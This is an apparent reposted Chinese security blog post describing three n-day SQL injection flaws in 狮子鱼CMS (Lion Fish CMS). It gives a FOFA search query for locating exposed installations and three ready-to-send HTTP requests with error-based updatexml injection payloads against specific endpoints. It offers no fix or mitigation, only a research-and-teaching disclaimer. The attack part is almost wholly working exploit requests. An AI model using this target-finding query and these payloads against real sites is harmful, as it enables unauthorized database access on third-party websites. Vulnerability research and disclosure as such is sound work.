0x02 漏洞描述
(一) 狮子鱼CMS
狮子鱼CMS(Content Management System)是一种网站管理系统,旨在帮助用户更轻松地创建和管理网站。它具有用户友好的界面和丰富的功能,包括页面管理、博客、新闻、产品展示等。
狮子鱼CMS使用简单直观的管理界面,使得网站所有者可以方便地进行内容的发布、管理和布局。它支持多种类型的内容,包括文字、图片、视频等,并允许用户根据需要进行自定义设置。
此外,狮子鱼CMS还具有强大的模板和主题系统,用户可以根据自己的需求和喜好选择合适的模板和主题来定制网站的外观和风格。它还提供了各种插件和扩展,以帮助用户进一步扩展和定制网站的功能
。
fofa语法:
body
=
"/seller.php?s=/Public/login"
(二) 漏洞复现
注入1:
GET /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
注入2:
GET
/index.php?s=/Utility/file&do=image&groupid=123)
%20
or
%20
updatexml(1,concat(0x7e,user(),0x7e),1)--+ HTTP/1.1
Host
:
User
-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
注入3:
POST /index.php?s=/Scekill/load_gps_goodslist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Content-Type: application/x-www-form-urlencoded
gid=1229) or updatexml(1,concat(0x7e,user(),0x7e),1)
#
原文始发于微信公众号(SCA御盾):【漏洞复现】(nday)狮子鱼3个注入复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论